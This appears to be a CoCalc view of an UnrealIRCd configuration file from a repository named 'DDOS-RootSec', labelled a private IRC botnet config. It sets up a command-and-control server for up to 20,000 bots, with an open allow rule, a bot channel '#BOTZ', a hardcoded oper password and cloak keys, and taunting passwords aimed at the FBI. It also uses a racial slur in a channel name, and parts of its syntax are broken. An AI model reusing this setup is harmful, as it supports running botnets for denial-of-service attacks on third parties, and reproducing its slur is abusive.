Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
Path: blob/master/Botnets/IRC/MYunrealircd.conf
5038 views
1
###############################################################################
2
# ___ __________ ____ _______ _____ _______________.___. ___ #
3
# / _ \_/\ \______ \/_ |\ \ / _ \\______ \__ | | / _ \_/\ #
4
# \/ \___/ | | _/ | |/ | \ / /_\ \| _// | | \/ \___/ #
5
# | | \ | / | \/ | \ | \\____ | #
6
# |______ / |___\____|__ /\____|__ /____|_ // ______| #
7
# \/ \/ \/ \/ \/ #
8
###############################################################################
9
#~B1NARY~ PRIVATE IRC BOTNET CONFIG | DO NOT LEAK THIS IRC BOTNET CONFIG FILE #
10
###############################################################################
11
12
#########################################
13
############## ME BLOCK #################
14
#########################################
15
me {
16
name "BoT.NeT"; #SERVER NAME
17
info "B1NARY~ BoATNeT"; #SERVER DESCRIPTION
18
numeric 120;
19
};
20
21
#########################################
22
############## ADMIN BLOCK ##############
23
#########################################
24
admin {
25
"B1NARY";
26
};
27
28
#########################################
29
############## CLASS BLOCK ##############
30
#########################################
31
class clients {
32
pingfreq 150;
33
maxclients 20000;
34
sendq 1000000;
35
recvq 8000;
36
};
37
38
#########################################
39
############## ALLOW BLOCK ##############
40
#########################################
41
allow {
42
ip *@*;
43
hostname *@*;
44
class clients;
45
maxperip 1;
46
};
47
48
#########################################
49
############## LISTEN BLOCK #############
50
#########################################
51
listen *:6667;
52
53
#########################################
54
############## OPER BLOCK ###############
55
#########################################
56
oper "B1NARY" {
57
from {
58
userhost *@*;
59
};
60
password "BOATNET";
61
class clients;
62
flags {
63
netadmin;
64
can_zline;
65
can_gkline;
66
};
67
};
68
69
#########################################
70
############## DRPASS BLOCK #############
71
#########################################
72
drpass {
73
restart "Fuck.FBI.GOV";
74
die "Die.Fucking.Feds";
75
};
76
77
#########################################
78
############## LOG BLOCK ################
79
#########################################
80
log ircd.log {
81
maxsize 50MB;
82
flags {
83
errors;
84
kills;
85
tkl;
86
connects;
87
server-connects;
88
oper;
89
sadmin-commands;
90
chg-commands;
91
oper-override;
92
spamfilter;
93
};
94
};
95
96
#########################################
97
############## SET BLOCK ################
98
#########################################
99
set {
100
network-name "VenomSeC";
101
default-server none;
102
services-server "services.VenomSeC.GOV";
103
help-channel "#HelpThisNigga";
104
kline-address "[email protected]";
105
modes-on-connect "+xwGM";
106
modes-on-oper "+xwgspH";
107
restrict-usermodes "G";
108
restrict-channelmodes "G";
109
modes-on-join "+nust";
110
oper-auto-join "#BOTZ"; #CHANGE THIS
111
maxchannelsperuser 30;
112
anti-spam-quit-message-time 100s;
113
static-quit "Remote user closed the connection";
114
oper-only-stats "*";
115
help-channel "#HelpThisNigga";
116
hiddenhost-prefix "hidden";
117
default-bantime "0";
118
throttle {
119
connections 3;
120
period 60s;
121
};
122
123
anti-flood {
124
nick-flood 50:60;
125
};
126
127
spamfilter{
128
ban-time 1d;
129
ban-reason "Spam/Advertising"
130
virus-help-channel "#help"
131
}
132
133
dns{
134
nameserver 127.0.0.1;
135
timeout 2s;
136
retries 2;
137
138
);
139
140
options {
141
hide-ulines;
142
show-connect-info;
143
show-opermotd;
144
allow-part-if-shunned;
145
flat-map;
146
fail-oper-warn;
147
};
148
149
hosts {
150
global "ircop.VenomSeC.GOV";
151
coadmin "coadmin.VenomSeC.GOV";
152
admin "admin.VenomSeC.GOV";
153
servicesadmin "csops.VenomSeC.GOV";
154
netadmin "B1NARY.VenomSeC.GOV";
155
};
156
cloak-keys {
157
"SjdloajOF8304hDkjgaow";
158
"JME20cLt3m1k0DhFu93nyASjg51T";
159
"FhioefWgXDK14Su9320Giasb74A";
160
};
161
};
162
163
#########################################
164
############## MISC #################
165
#########################################
166
include "help.conf";
167
include "badwords.channel.conf";
168
include "badwords.message.conf";
169
include "badwords.quit.conf";
170
include "spamfilter.conf";
171
loadmodule src/modules/commands.so;
172
loadmodule src/modules/cloak.so;
173